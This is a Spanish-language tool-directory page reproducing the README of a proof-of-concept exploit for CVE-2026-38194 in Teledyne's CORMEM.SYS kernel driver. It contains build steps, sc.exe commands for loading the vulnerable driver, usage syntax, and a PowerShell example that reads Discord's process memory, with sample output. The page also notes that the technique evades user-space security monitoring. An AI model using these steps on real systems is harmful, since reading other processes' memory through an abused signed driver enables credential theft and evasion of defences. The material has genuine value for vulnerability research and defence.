Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cormem-read-poc — Esta herramienta demuestra CVE-2026-38194, una vulnerabilidad en Teledyne Digital Imaging Sapera Memory Manager (v9.0.0.0 y anteriores). El controlador de kernel CORMEM.SYS expone IOCTLs sin ninguna comprobación de control de acceso, lo que permite a un usuario estándar no privilegiado leer y escribir memoria de proceso arbitraria directamente a través del kernel, evadiendo la monitorización de la API Win32. | Kitploit
Herramientas/GitHubGitHub/4d4j/cormem-read-poc
Escalada de PrivilegiosForensia de MemoriaAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónExplotación de Binarios
GitHub4d4j/cormem-read-poc

cormem-read-poc

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Esta herramienta demuestra CVE-2026-38194, una vulnerabilidad en Teledyne Digital Imaging Sapera Memory Manager (v9.0.0.0 y anteriores). El controlador de kernel CORMEM.SYS expone IOCTLs sin ninguna comprobación de control de acceso, lo que permite a un usuario estándar no privilegiado leer y escribir memoria de proceso arbitraria directamente a través del kernel, evadiendo la monitorización de la API Win32.

814hace 2 mesesAún no revisado
Compartir

DESCARGO DE RESPONSABILIDAD:

Este proyecto es solo para fines educativos y de investigación en seguridad. Úselo únicamente en sistemas que posea o para los que tenga permiso explícito para realizar pruebas. El uso no autorizado puede ser ilegal en su jurisdicción.

cordrv_exploit — CVE-2026-38194

Vulnerabilidad

Esta herramienta demuestra la CVE-2026-38194, una vulnerabilidad en Teledyne Digital Imaging Sapera Memory Manager (v9.0.0.0 y anteriores).

El controlador del kernel CORMEM.SYS expone IOCTLs sin ninguna comprobación de control de acceso, permitiendo a un usuario estándar sin privilegios leer y escribir memoria de procesos arbitraria directamente a través del kernel — evitando por completo la monitorización de la API Win32.

poc

La memoria se accede mediante traducción de direcciones físicas (recorrido de tabla de páginas) en lugar de ReadProcessMemory, lo que lo hace transparente para la mayoría del software de seguridad en espacio de usuario.

Requisitos

  • Windows 10/11
  • CORMEM.SYS cargado
  • Visual Studio 2022/2026 + CMake 3.20+

Compilación

root@kitploit:~
cmake -B build -A x64
cmake --build build --config Release

Cargando el controlador

Si CORMEM.SYS no está cargado, cárguelo manualmente como administrador:

root@kitploit:~
sc.exe create CORMEM binPath= "C:\path\to\CORMEM.SYS" type= kernel start= demand
sc.exe start CORMEM

Descargue cuando termine:

root@kitploit:~
sc.exe stop CORMEM
sc.exe delete CORMEM

Uso

root@kitploit:~
cordrv_exploit.exe <pid> <address> [size]

  pid      Process ID (decimal)
  address  Virtual address to read (hex)
  size     Bytes to dump, default 256, max 1048576

Ejemplo — leyendo el encabezado PE de Discord

root@kitploit:~
# Get the main Discord process
$proc = Get-Process -Name "Discord" | Sort-Object WorkingSet -Descending | Select-Object -First 1
$discordPid = $proc.Id
$base = $proc.Modules[0].BaseAddress

Write-Host "PID  : $discordPid"
Write-Host "Base : 0x$($base.ToString('X'))"

.\build\Release\cordrv_exploit.exe $discordPid "0x$($base.ToString('X'))" 256

Salida esperada:

root@kitploit:~
[*] Target PID     : 16364
[*] Target address : 0x7FF6FC180000
[*] Dump size      : 256 bytes

[*] Initializing CorDrv...
[+] Driver initialized.

[*] Finding system DTB...
[+] System DTB: 0x1AE000

[*] Searching EPROCESS list for PID 16364...
[+] Process DTB: 0x2CD30F000

[+] VA 0x7FF6FC180000 -> PA 0x1A98C2000

Memory dump (0x7FF6FC180000, 256 bytes):
  7FF6FC180000: 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00
  7FF6FC180010: 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
  ...

[+] Done.

El 4D 5A en el desplazamiento 0 confirma que el encabezado MZ se leyó correctamente desde la RAM física.

Notas

  • Las páginas que se han intercambiado al disco no se pueden leer (TranslateVirtualAddress devolverá 0).
  • Algunos procesos generan múltiples instancias; apunte siempre a la que tenga el conjunto de trabajo más grande.
  • HVCI / Secure Boot puede bloquear CORMEM.SYS en Windows 11 si el controlador está en la lista de bloqueo de Microsoft.
Descargar herramienta